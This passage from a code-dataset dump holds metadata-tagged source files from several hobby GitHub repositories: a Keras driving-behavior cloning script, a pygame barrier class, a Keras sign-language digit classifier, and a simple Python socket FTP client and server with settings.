and output a number.\n\n![Network Architecture][image5]\n\n\n#### 3. Training Process & Results\n\nAt first, we try to collect good driving behaviors by shiftting the car smoothly. Then we feed our network with cropped RGB images and let the network using the 'MSE' to back propagate the weights. We use the Adam optimizer to optimize our network and in order to keep the best weights, we set up one check pointer monitoring the validation loss. The one who has minimum validation loss is our best weights.\n\nAfter training, we save the best weights into \"model.hdf5\" and run it in autonomous mode in game.\n\n![Autonomous Mode][image6]\n\n\n" }, { "alpha_fraction": 0.6269587278366089, "alphanum_fraction": 0.6596461534500122, "avg_line_length": 45.72441101074219, "blob_id": "f9da471613df3c975e23b9f09e56cfb95d4deb0e", "content_id": "990b2154ec0c98db671c9e7a1770ea4da03db896", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5935, "license_type": "permissive", "max_line_length": 191, "num_lines": 127, "path": "/model.py", "repo_name": "chenwade/CarND-Behavioral-Cloning-P3", "src_encoding": "UTF-8", "text": "import os\nimport csv\nimport cv2\nimport numpy as np\nfrom keras import optimizers\nfrom keras.models import Sequential, Model\nfrom keras.layers import Cropping2D, Flatten, Dense, Lambda, Convolution2D, Dropout\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nfrom keras.callbacks import ModelCheckpoint\n\n\n# Initialize parameters for the whole program\ncorrection = 0.2\nlr = 0.001\nbeta_1 = 0.9\nbeta_2 = 0.999\nepsilon = None\ndecay = 0.0\nrate = 0.5\n\n\n# Open the driving_log.csv file which contains the images names captured by three different\n# camera (center, left, right).\nlines = []\nwith open('driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n lines.append(line)\n\n# Split the training data and testing data with ratio 8:2\ntrain_samples, validation_samples = train_test_split(lines, test_size=0.2)\n\n# Define the generator as it creates batch and output them\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1:\n shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n measurements = []\n for line in batch_samples:\n # Get paths of three types of images (center, left, right)\n center_path = line[0]\n left_path = line[1]\n right_path = line[2]\n # Extract the filename of them\n center_filename = center_path.split('/')[-1]\n left_filename = left_path.split('/')[-1]\n right_filename = right_path.split('/')[-1]\n current_center_path = 'IMG/' + center_filename\n current_left_path = 'IMG/' + left_filename\n current_right_path = 'IMG/' + right_filename\n # Read all images and store them\n center_image = cv2.imread(current_center_path)\n left_image = cv2.imread(current_left_path)\n right_image = cv2.imread(current_right_path)\n # Convert BGR into RGB images\n center_image = cv2.cvtColor(center_image, cv2.COLOR_BGR2RGB)\n left_image = cv2.cvtColor(left_image, cv2.COLOR_BGR2RGB)\n right_image = cv2.cvtColor(right_image, cv2.COLOR_BGR2RGB)\n # Append them into images, first center_image, then left_image and last right_image\n images.append(center_image)\n images.append(left_image)\n images.append(right_image)\n # Append the angles into measurements, first center_angle, then left_angle and last right_angle\n center_measurement = float(line[3])\n left_measurement = center_measurement + correction\n right_measurement = center_measurement - correction\n measurements.append(center_measurement)\n measurements.append(left_measurement)\n measurements.append(right_measurement)\n # Store the flipped images and its steering_angle\n augmented_images = []\n augmented_measurements = []\n for image, measurement in zip(images, measurements):\n augmented_images.append(image)\n augmented_measurements.append(measurement)\n augmented_images.append(cv2.flip(image, 1))\n augmented_measurements.append(measurement * -1.0)\n\n # Setting X data and y data, where x data contains images from different angle, and y data contains its\n # corresponding angles.\n x = np.array(augmented_images)\n y = np.array(augmented_measurements)\n # Shuffle the data\n yield shuffle(x, y)\n\n\n# Compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=32)\nvalidation_generator = generator(validation_samples, batch_size=32)\n\n\n# Network Architecture\nmodel = Sequential()\n# Normalizing the data into range [-1, 1].\nmodel.add(Lambda(lambda x: x / 127.5 - 1, input_shape=(160, 320, 3)))\n# Cropping the image and keep the area where we are interested.\nmodel.add(Cropping2D(cropping=((50, 20), (0, 0)), input_shape=(160, 320, 3)))\n# Input shape (90, 320, 3), output shape (43, 158, 24) Valid padding\nmodel.add(Convolution2D(filters=24, kernel_size=5, strides=2, padding='valid', activation='relu'))\n# Input shape (43, 158, 24), output shape (20, 77, 36) valid padding\nmodel.add(Convolution2D(filters=36, kernel_size=5, strides=2, padding='valid', activation='relu'))\n# Input shape (20, 77, 36), output shape (8, 37, 48) valid padding\nmodel.add(Convolution2D(filters=48, kernel_size=5, strides=2, padding='valid', activation='relu'))\n# Input shape (8, 37, 48), output shape (6, 35, 64) valid padding\nmodel.add(Convolution2D(filters=64, kernel_size=3, strides=1, padding='valid', activation='relu'))\n# Input shape (6, 35, 64), output shape (4, 33, 64) valid padding\nmodel.add(Convolution2D(filters=64, kernel_size=3, strides=1, padding='valid', activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dense(50))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n\n# Setting up the optimizer as Adam optimizer with lr = 0.001, beta_1 = 0.9, beta_2 = 0.999 and no weight_decay.\nsgd = optimizers.Adam(lr=lr, beta_1=beta_1, beta_2=beta_2, epsilon=epsilon, decay=decay, amsgrad=False)\nmodel.compile(loss='mse', optimizer=sgd)\n\n# Storing the weight into file \"model.hdf5\"\nfile_path = \"model.hdf5\"\n\n# Setting up a check pointer to monitor the validation loss and pick the best weights among them.\ncheck_pointer = ModelCheckpoint(filepath=file_path, monitor='val_loss', verbose=1, save_best_only=True)\nmodel.fit_generator(train_generator, samples_per_epoch=len(train_samples), validation_data=validation_generator, nb_val_samples=len(validation_samples), nb_epoch=5, callbacks=[check_pointer])\n\n" } ]
2
GabeMags/AlienGame
https://github.com/GabeMags/AlienGame
1752b05e3f7ab77f868faca386eda63f32095773
c593b8473c4430d0fe0c440f1fd67fe20eb446e1
116fbdd390add60288b774bf661567578de9c714
refs/heads/master
2020-04-24T05:22:45.342623
2019-02-20T19:32:03
2019-02-20T19:32:03
171,733,527
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6165951490402222, "alphanum_fraction": 0.6266094446182251, "avg_line_length": 28.478260040283203, "blob_id": "c0c2a22fb205a1b003414495d56e38d9544fb1ff", "content_id": "666922f7f092ab1590f58349572045e3f9da50c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "no_license", "max_line_length": 64, "num_lines": 23, "path": "/venv/barrier.py", "repo_name": "GabeMags/AlienGame", "src_encoding": "UTF-8", "text": "import pygame\r\n\r\nfrom pygame.sprite import Sprite\r\n\r\nclass Barrier():\r\n #A class to represent a single barrier shield\r\n\r\n def __init__(self, ai_settings, screen):\r\n #Initialize the barrier and set its position in the game\r\n self.screen = screen\r\n self.ai_settings = ai_settings\r\n\r\n #Load the barrier image and set its rect attribute\r\n self.image = pygame.image.load('images/barrier_1.png')\r\n self.rect = self.image.get_rect()\r\n\r\n #Place each barrier near the bottom of the screen\r\n self.rect.x = 200\r\n self.rect.y = 500\r\n\r\n def blitme(self):\r\n #blit the barrier on screen\r\n self.screen.blit(self.image, self.rect)" } ]
1
Abdulrhman-asim/Neural-Networks
https://github.com/Abdulrhman-asim/Neural-Networks
c7241be256348af0dc99f4bb26f928e81f5f9353
2376d24f2de177e8ba73e1969e5b40f9da4f9fcf
c1ec79703d3f133e30db1d2154a75fef8e0be84e
refs/heads/master
2020-12-01T15:21:31.763129
2019-12-28T23:47:34
2019-12-28T23:47:34
230,679,385
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.527127742767334, "alphanum_fraction": 0.5660870671272278, "avg_line_length": 26.220640182495117, "blob_id": "322151a961dffec9dcc87fd725119632f7c55107", "content_id": "6b335261f27c3c8b1f75ef050d80d38af41c77e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7649, "license_type": "no_license", "max_line_length": 100, "num_lines": 281, "path": "/SignNumber_Classifier.py", "repo_name": "Abdulrhman-asim/Neural-Networks", "src_encoding": "UTF-8", "text": "import os\nimport cv2\nimport numpy as np\nimport random\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, accuracy_score\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Flatten, Conv2D, MaxPooling2D\n\n\ndef readData(colorType):\n datapath = 'E:/College Crap/MachineLearning/Project/Sign-Language-Digits-Dataset-master/Dataset'\n categories = 10\n data = []\n x = []\n y = []\n avgs = []\n for i in range(0, categories):\n currentNumPath = os.path.join(datapath, str(i))\n for img in os.listdir(currentNumPath):\n if colorType == 1:\n imgArray = cv2.imread(os.path.join(currentNumPath, img), cv2.IMREAD_GRAYSCALE)\n else:\n imgArray = cv2.imread(os.path.join(currentNumPath, img))\n avgs.append(imgArray.mean())\n\n imgArray = cv2.resize(imgArray, (100, 100))\n data.append([imgArray, i])\n\n random.shuffle(data)\n avgs = np.array(avgs).mean()\n\n for features, label in data:\n x.append(features)\n y.append(label)\n\n if colorType == 1:\n x = np.array(x).reshape(-1, 100, 100, 1)\n else:\n x = np.array(x).reshape(-1, 100, 100, 3)\n x = np.subtract(x, avgs)\n\n x = np.divide(x, 255)\n\n return x, y\n\ndef createNNModels(x):\n\n ###########################\n # First model\n ###########################\n\n model1 = Sequential()\n\n model1.add(Flatten(input_shape=x.shape[1:]))\n model1.add(Dense(200))\n model1.add(Activation('relu'))\n\n model1.add(Dense(128))\n model1.add(Activation('relu'))\n\n model1.add(Dense(10))\n model1.add(Activation('softmax'))\n\n model1.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n ###########################\n # Second model\n ###########################\n\n model2 = Sequential()\n\n model2.add(Flatten(input_shape=x.shape[1:]))\n model2.add(Dense(256))\n model2.add(Activation('relu'))\n\n model2.add(Dense(128))\n model2.add(Activation('relu'))\n\n model2.add(Dense(64))\n model2.add(Activation('relu'))\n\n model2.add(Dense(10))\n model2.add(Activation('softmax'))\n\n model2.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n ###########################\n # Third model\n ###########################\n\n\n model3 = Sequential()\n\n model3.add(Flatten(input_shape=x.shape[1:]))\n\n model3.add(Dense(128))\n model3.add(Activation('relu'))\n\n\n model3.add(Dense(10))\n model3.add(Activation('softmax'))\n\n model3.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n ###########################\n # Fourth model\n ###########################\n\n\n model4 = Sequential()\n\n model4.add(Flatten(input_shape=x.shape[1:]))\n\n model4.add(Dense(10))\n model4.add(Activation('softmax'))\n\n model4.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n return model1, model2, model3, model4\n\n\ndef createModels(x):\n ###########################\n # First model\n ###########################\n\n model1 = Sequential()\n\n model1.add(Conv2D(32, (3, 3), input_shape=x.shape[1:]))\n model1.add(Activation('relu'))\n model1.add(MaxPooling2D(pool_size=(2, 2)))\n\n model1.add(Conv2D(32, (3, 3)))\n model1.add(Activation('relu'))\n model1.add(MaxPooling2D(pool_size=(2, 2)))\n\n model1.add(Flatten())\n model1.add(Dense(32))\n\n model1.add(Dense(10))\n model1.add(Activation('softmax'))\n\n model1.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n\n\n ###########################\n # Second model\n ###########################\n\n model2 = Sequential()\n\n model2.add(Conv2D(64, (4, 4), input_shape=x.shape[1:]))\n model2.add(MaxPooling2D(pool_size=(2, 2)))\n model2.add(Activation('elu'))\n\n model2.add(Conv2D(64, (4, 4)))\n model2.add(MaxPooling2D(pool_size=(2, 2)))\n model2.add(Activation('elu'))\n\n model2.add(Conv2D(64, (4, 4)))\n model2.add(MaxPooling2D(pool_size=(2, 2)))\n model2.add(Activation('elu'))\n\n model2.add(Flatten())\n model2.add(Dense(64))\n\n model2.add(Dense(10))\n model2.add(Activation('softmax'))\n\n model2.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n ###########################\n # Third model\n ###########################\n\n model3 = Sequential()\n\n model3.add(Conv2D(50, (4, 4), input_shape=x.shape[1:]))\n model3.add(MaxPooling2D(pool_size=(3, 3)))\n model3.add(Activation('elu'))\n\n model3.add(Conv2D(50, (3, 3)))\n model3.add(MaxPooling2D(pool_size=(2, 2)))\n model3.add(Activation('relu'))\n\n model3.add(Flatten())\n model3.add(Dense(64))\n\n model3.add(Dense(10))\n model3.add(Activation('softmax'))\n\n model3.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n ###########################\n # Fourth model\n ###########################\n\n model4 = Sequential()\n\n model4.add(Conv2D(64, (4, 4), input_shape=x.shape[1:]))\n model4.add(MaxPooling2D(pool_size=(3, 3)))\n model4.add(Activation('relu'))\n\n model4.add(Conv2D(64, (3, 3)))\n model4.add(Activation('relu'))\n model4.add(MaxPooling2D(pool_size=(2, 2)))\n\n model4.add(Conv2D(64, (2, 2)))\n model4.add(Activation('relu'))\n model4.add(MaxPooling2D(pool_size=(2, 2)))\n\n model4.add(Flatten())\n model4.add(Dense(32))\n\n model4.add(Dense(10))\n model4.add(Activation('softmax'))\n\n model4.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n return model1, model2, model3, model4\n\n\ndef main():\n ###############################\n # Grayscale Image Testing\n ###############################\n\n # Read the data as grayscale\n x, y = readData(1)\n\n # Read the data as RGB\n x2, y2 = readData(2)\n\n\n\n # Split the data for training and testing\n X_train, X_test, Y_train, Y_test = train_test_split(x, y, train_size=0.8)\n\n X2_train, X2_test, Y2_train, Y2_test = train_test_split(x2, y2, train_size=0.8)\n\n # Create Models\n models = createNNModels(x)\n rgbModels = createModels(x2);\n print(\"Models Fitting\")\n print(\"--------------------------------------\")\n for m in range (0, len(models)):\n print(\"Grayscale Model no \" + str(m + 1) + \": \")\n\n models[m].fit(X_train, Y_train, batch_size=16, validation_split=0.2, epochs=50)\n print(\"RGB Model no \" + str(m + 1) + \": \")\n rgbModels[m].fit(X2_train, Y2_train, batch_size=16, validation_split=0.2, epochs=8)\n\n\n print(\"Models performance on grayscale images\")\n print(\"--------------------------------------\")\n\n for m in range(0, len(models)):\n print(\"Grayscale Model no \" + str(m+1) + \": \")\n\n predictions = models[m].predict_classes(X_test)\n acc = accuracy_score(y_true=Y_test, y_pred=predictions)\n print(\"Accuracy: \" + str(acc))\n print(classification_report(Y_test, predictions))\n print(\"========================================\")\n\n print(\"Models performance on RGB images\")\n print(\"--------------------------------------\")\n\n for m in range(0, len(rgbModels)):\n print(\"RGB Model no \" + str(m + 1) + \": \")\n predictions = rgbModels[m].predict_classes(X2_test)\n acc = accuracy_score(y_true=Y2_test, y_pred=predictions)\n print(\"Accuracy: \" + str(acc))\n print(classification_report(Y2_test, predictions))\n print(\"========================================\")\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.8114285469055176, "alphanum_fraction": 0.8114285469055176, "avg_line_length": 48.85714340209961, "blob_id": "58d53cdb81b76b936d84da22fd804c26cd7654bb", "content_id": "bdc6d0087997c5735833bee1ec09d94b22417c37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 352, "license_type": "no_license", "max_line_length": 108, "num_lines": 7, "path": "/README.md", "repo_name": "Abdulrhman-asim/Neural-Networks", "src_encoding": "UTF-8", "text": "# Neural-Networks\nExperimenting with Keras framework and and Neural Networks.\n\nDataset is from 'Turkey Ankara Ayranci Anadolu High School's Sign Language Digits'.\nLink to dataset (​https://github.com/ardamavi/Sign-Language-Digits-Dataset)\n\nThe program servers to observe the effect of different NN architectures on the accuracy of predictions made.\n\n" } ]
2
samuelcolvin/csv-labels
https://github.com/samuelcolvin/csv-labels
0c181fa82df2ec2e778352c155117708bc7d81bc
a575a3f41f231c0c4f4759f6e8bf576886a43249
12075326a2e623669a779a7f0a0f8cde5be5b767
refs/heads/master
2023-08-31T07:05:51.113337
2019-04-12T13:08:48
2019-04-12T13:08:48
174,330,793
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.5217865109443665, "alphanum_fraction": 0.5348584055900574, "avg_line_length": 17.73469352722168, "blob_id": "1636f4f21b184124572285b67bca320d48249810", "content_id": "65c2246fb277bb9c36e586d4e320798f58a6364b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 918, "license_type": "no_license", "max_line_length": 97, "num_lines": 49, "path": "/times/build.py", "repo_name": "samuelcolvin/csv-labels", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom csv import DictReader\nfrom pathlib import Path\n\nTHIS_DIR = Path(__file__).parent\np = THIS_DIR / 'input.csv'\n\n\nentries = []\nwith p.open(newline='') as f:\n reader = DictReader(f)\n for row in reader:\n cls = row.pop('Class')\n number = row.pop('Number')\n name = row['Team Name']\n info = '\\n'.join(f'<div class=\"info\"><b>{k}:</b> {v}</div>' for k, v in row.items() if v)\n entries.append(\n f\"\"\"\\\n <div class=\"entry\">\n <h2>Class {cls}, No. {number} - {name}</h2>\n {info}\n </div>\"\"\"\n )\n\nstyles = \"\"\"\\\n<style>\n html, body {\n margin: 0;\n padding: 0;\n }\n h2 {\n margin-bottom: 5px;\n }\n .entry {\n box-sizing: border-box;\n margin: 0 auto 20px;\n page-break-inside: avoid;\n }\n . info {\n margin-bottom: 10px;\n }\n</style>\n\"\"\"\nall = '\\n'.join(entries)\nPath('out/output.html').write_text(f\"\"\"\\\n{styles}\n{all}\n\"\"\"\n)\n" }, { "alpha_fraction": 0.5341529846191406, "alphanum_fraction": 0.556693971157074, "avg_line_length": 18.01298713684082, "blob_id": "0d465da824f1d4a06c8657755699ee715dac859e", "content_id": "6d43ca86156d6f91f3d6784e02cac3cc33209757", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1464, "license_type": "no_license", "max_line_length": 74, "num_lines": 77, "path": "/build.py", "repo_name": "samuelcolvin/csv-labels", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom csv import DictReader\nfrom pathlib import Path\n\n\ndef chunk(l, n):\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\np = Path('input.csv')\n\naddresses = []\nwith p.open(newline='') as f:\n reader = DictReader(f)\n for row in reader:\n address = {k.lower().replace(' ', '_'): v for k, v in row.items()}\n addresses.append(\n \"\"\"\\\n <div class=\"address\">\n <span>{title} {initial} {first_name} {surname}</span>\n <span>{address_1}</span>\n <span>{address_2}</span>\n <span>{address_3}</span>\n <span>{town}</span>\n <span>{post_code}</span>\n </div>\"\"\".format(**address)\n )\n\npages = []\n\nfor adr in chunk(addresses, 21):\n pages.append('<div class=\"page\">\\n{}\\n</div>'.format('\\n'.join(adr)))\n\n\nstyles = \"\"\"\\\n<style>\n html, body {\n margin: 0;\n padding: 0;\n }\n .page {\n width: 210mm;\n height: 297mm;\n box-sizing: border-box;\n padding-top: 12mm;\n padding-bottom: 17mm;\n padding-left: 7mm;\n margin: 0 auto;\n display: grid;\n grid-template-columns: repeat(3, 1fr);\n grid-template-rows: repeat(7, 1fr);\n page-break-after: always;\n border: 1px solid #ddd;\n }\n @media print\n {\n .page {\n border: none;\n }\n }\n .address {\n font-size: 0.9rem;\n margin: 0 5.5mm;\n padding-top: 6.5mm;\n }\n .address span {\n display: block;\n }\n</style>\n\"\"\"\nall = '\\n'.join(pages)\nPath('out/output.html').write_text(f\"\"\"\\\n{styles}\n{all}\n\"\"\"\n)\n" } ]
2
liuxingrichu/simple-FTP
https://github.com/liuxingrichu/simple-FTP
15451843dbe9cd89a66298bcbc30c972105b12bf
93e1254146f616b8d21410da1b277d9947d54db6
03cc66bb2063f75ed1afcbfbd2ae0ef4e476e3d1
refs/heads/master
2021-01-22T07:35:50.560168
2017-02-18T04:04:55
2017-02-18T04:04:55
81,836,517
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.44285714626312256, "alphanum_fraction": 0.4642857015132904, "avg_line_length": 18.928571701049805, "blob_id": "f097b797b94253580cc05f058ffae95f49e99963", "content_id": "26e545b50a28a7d25e65d485b18f4934d867f752", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 926, "license_type": "no_license", "max_line_length": 74, "num_lines": 28, "path": "/FTP思路.md", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "GB18030", "text": "\n目录结构:\n\nFTPClient\n\tftp_client.py\t\t客户端\n\ttest1-3.txt\t\t\t测试文件\nFTPServer\n\tftp_server.py\t\t服务器\nconf\n\t__init__.py\t\t\t配置信息\ndatabase\n\tinit_db.py\t\t\t初始化用户名和密码\n\t\n*************************************************************************\t\n\n程序运行说明:\n\n(1)通过database中的init_db.py生成用户名和密码\n\n(2)服务器端先运行,再启动客户端\n\n(3)客户端打印下面提示信息,通过用户选择,进行相应操作\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n\n(4)服务端,仅打印用户登录、退出信息及客户端断开信息\n\n(5)对应异常情况,进行捕获处理,保证服务器不因客户端状态而停止工作。\n\n" }, { "alpha_fraction": 0.4959999918937683, "alphanum_fraction": 0.6159999966621399, "avg_line_length": 14.75, "blob_id": "932704c2c8d5981064e0fa708e50f19aa24775c4", "content_id": "352e051f4fc0e503d154bb0de1dbb493ecbf6d6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 125, "license_type": "no_license", "max_line_length": 22, "num_lines": 8, "path": "/FTPClient/settings.py", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nSUCCESS_CODE = '200'\nFAIL_CODE = '404'\nsize = 1024\nip = 'localhost'\nport = 6969" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.49646198749542236, "avg_line_length": 31.69403076171875, "blob_id": "8e7001153b78b7ac7d443defa9a9bc5eb6021cb2", "content_id": "15db3dec13ca95a61424eded25b809680358ca60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4633, "license_type": "no_license", "max_line_length": 79, "num_lines": 134, "path": "/FTPClient/ftp_client.py", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport os\nimport re\nimport socket\nimport sys\n\nBASE_PATH = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_PATH)\n\nimport settings\n\ntemplates = [\"【1】登录\", \"【2】上传文件\", \"【3】下载文件\", \"【4】查看文件列表\", \\\n \"【5】退出\"]\n\n\nclass SimpleClient(object):\n \"\"\"\n FTP client\n \"\"\"\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n\n def login(self, conn):\n user_info = \"|\".join([\"login\", self.username, self.password])\n conn.send(bytes(user_info, encoding='utf-8'))\n return conn.recv(settings.size)\n\n def upload(self, file_name, client):\n data_list = ['upload', file_name]\n try:\n with open(file_name, 'r') as f:\n data_list.append(f.read())\n except FileNotFoundError:\n print(\"\\t\\033[0;31m文件不存在\\033[1m\")\n return False\n client.send(bytes(\"|\".join(data_list), encoding='utf-8'))\n return True\n\n def download(self, file_name, client):\n data_list = ['download', file_name]\n client.send(bytes(\"|\".join(data_list), encoding='utf-8'))\n file_data = client.recv(settings.size)\n if file_data == bytes(settings.FAIL_CODE, encoding='utf-8'):\n return settings.FAIL_CODE\n with open(file_name, 'wb') as f:\n f.write(file_data)\n return settings.SUCCESS_CODE\n\n def show_file_list(self, data):\n start_index = data.index('[') + 1\n tmp = re.split(\"[',]\", data[start_index:-2])\n data_list = []\n for i in tmp:\n if i.strip():\n data_list.append(i)\n print(\"文件列表\".center(30, '-'))\n for i in data_list:\n print(i)\n print(\"end\".center(33, '-'))\n\n def logout(self, conn):\n conn.close()\n\n\ndef main():\n client = socket.socket()\n client.connect((settings.ip, settings.port))\n user_status = False\n\n while True:\n print(\"FTP客户端\".center(67, \"-\"))\n print(\"{} {} {} {} {}\".format(templates[0], templates[1], templates[2],\n templates[3], templates[4]))\n print(\"end\".center(70, '-'))\n\n choice = input(\">>\").strip()\n if choice == \"1\":\n if not user_status:\n username = input(\"Enter username : \").strip()\n password = input(\"Enter password :\").strip()\n client_obj = SimpleClient(username, password)\n res = client_obj.login(client)\n if res == bytes(settings.SUCCESS_CODE, encoding='utf-8'):\n print(\"\\t\\033[0;32m欢迎%s登陆\\033[1m\" % username)\n user_status = True\n else:\n print(\"\\t\\033[0;31m用户名或密码错误!\\033[1m\")\n else:\n print(\"\\t\\033[0;31m用户已登陆!\\033[1m\")\n elif choice == \"2\":\n if user_status:\n print(\"\\t请输入上传文件名称,例如test.txt\")\n file_name = input(\"Enter upload file name : \").strip()\n res = client_obj.upload(file_name, client)\n if res:\n print(\"\\t\\033[0;32m文件上传成功!\\033[1m\")\n else:\n print(\"\\t\\033[0;31m请登录\\033[1m\")\n elif choice == \"3\":\n if user_status:\n print(\"\\t请输入下载文件名称,例如test.txt\")\n file_name = input(\"Enter download file name : \").strip()\n res = client_obj.download(file_name, client)\n if res == settings.SUCCESS_CODE:\n print(\"\\t\\033[0;32m文件下载成功!\\033[1m\")\n else:\n print(\"\\t\\033[0;31m文件不存在!\\033[1m\")\n else:\n print(\"\\t\\033[0;31m请登录!\\033[1m\")\n elif choice == \"4\":\n if user_status:\n client.send(bytes('ls', encoding='utf-8'))\n data = client.recv(settings.size)\n client_obj.show_file_list(str(data))\n else:\n print(\"\\t\\033[0;31m请登录!\\033[1m\")\n elif choice == \"5\":\n if user_status:\n client.send(bytes(\"quit\", encoding='utf-8'))\n client_obj.logout(client)\n break\n else:\n print(\"\\t\\033[0;31m请登录!\\033[1m\")\n else:\n print(\"\\t\\033[0;31m请输入正确选项!\\033[1m\")\n continue\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.579365074634552, "alphanum_fraction": 0.6388888955116272, "avg_line_length": 18.461538314819336, "blob_id": "6bc65807c57437c0f4182d5249b84c4533e38ace", "content_id": "89b74753f50d92c0b50e8096d267a31e505a6829", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 252, "license_type": "no_license", "max_line_length": 49, "num_lines": 13, "path": "/FTPServer/settings.py", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport os\n\nftp_path = r\"d:\\FTP_test\"\ndb_path = os.path.join(ftp_path, \"etc\")\nfile_path = os.path.join(db_path, \"user_info.db\")\nSUCCESS_CODE = '200'\nFAIL_CODE = '404'\nsize = 1024\nip = 'localhost'\nport = 6969" }, { "alpha_fraction": 0.4981183707714081, "alphanum_fraction": 0.5049606561660767, "avg_line_length": 29.44791603088379, "blob_id": "5fbc0afea87236d98ce059d5c7f8c483a63a0a96", "content_id": "db3e66046f39c4169d377a2c00cb5db29985a9f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2967, "license_type": "no_license", "max_line_length": 77, "num_lines": 96, "path": "/FTPServer/ftp_server.py", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport os\nimport socket\nimport sys\n\nBASE_PATH = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_PATH)\n\nfrom log import logger\nimport settings\n\n\nclass SimpleServer(object):\n \"\"\"\n FTP server\n \"\"\"\n\n def user_auth(self, data_list, conn):\n try:\n with open(settings.file_path, \"r\", encoding='utf-8') as f:\n for line in f:\n if line.strip() == '|'.join(data_list):\n return True\n return False\n except FileNotFoundError:\n logger.error('请先创建用户')\n\n def create_home(self, user_home):\n dir_path = os.path.join(settings.ftp_path, user_home)\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n os.chdir(dir_path)\n\n def save_file(self, file_name, file_data):\n data_list = file_data.split(\"\\n\")\n with open(file_name, 'w') as f:\n for line in data_list:\n f.write(line)\n f.write('\\n')\n\n def send_file(self, file_name, conn):\n try:\n with open(file_name, 'rb') as f:\n conn.send(f.read())\n except FileNotFoundError:\n conn.send(bytes(settings.FAIL_CODE, encoding=\"utf-8\"))\n\n def show_file_list(self, conn):\n cwd = os.getcwd()\n res = os.listdir(cwd)\n conn.send(bytes(str(res), encoding=\"utf-8\"))\n\n\ndef main():\n sever = socket.socket()\n sever.bind((settings.ip, settings.port))\n sever.listen()\n sever_obj = SimpleServer()\n while True:\n conn, addr = sever.accept()\n username = None\n while True:\n try:\n data = str(conn.recv(settings.size))\n except ConnectionResetError:\n if username:\n logger.warning(\"{} 异常退出!\".format(username))\n else:\n logger.warning(\"{} 异常退出!\".format(addr[0]))\n break\n\n data_list = data[2:-1].split('|')\n if data_list[0] == \"login\":\n res = sever_obj.user_auth(data_list[1:], conn)\n if res:\n sever_obj.create_home(data_list[1])\n username = data_list[1]\n logger.info(\"{} 登陆!\".format(username))\n conn.send(bytes(settings.SUCCESS_CODE, encoding='utf-8'))\n else:\n conn.send(bytes(settings.FAIL_CODE, encoding='utf-8'))\n elif data_list[0] == \"upload\":\n sever_obj.save_file(data_list[1], data_list[2])\n elif data_list[0] == \"download\":\n sever_obj.send_file(data_list[1], conn)\n elif data_list[0] == \"ls\":\n sever_obj.show_file_list(conn)\n elif data_list[0] == \"quit\":\n logger.info('%s 退出!' % username)\n break\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.5728542804718018, "alphanum_fraction": 0.5928143858909607, "avg_line_length": 17.55555534362793, "blob_id": "f206c671932f44ece99da3bed27f2ea36e651ce5", "content_id": "e445d3b6d317f1dd24b04c0b2ed81b5f9f41d6d7", "detected_licenses": [], 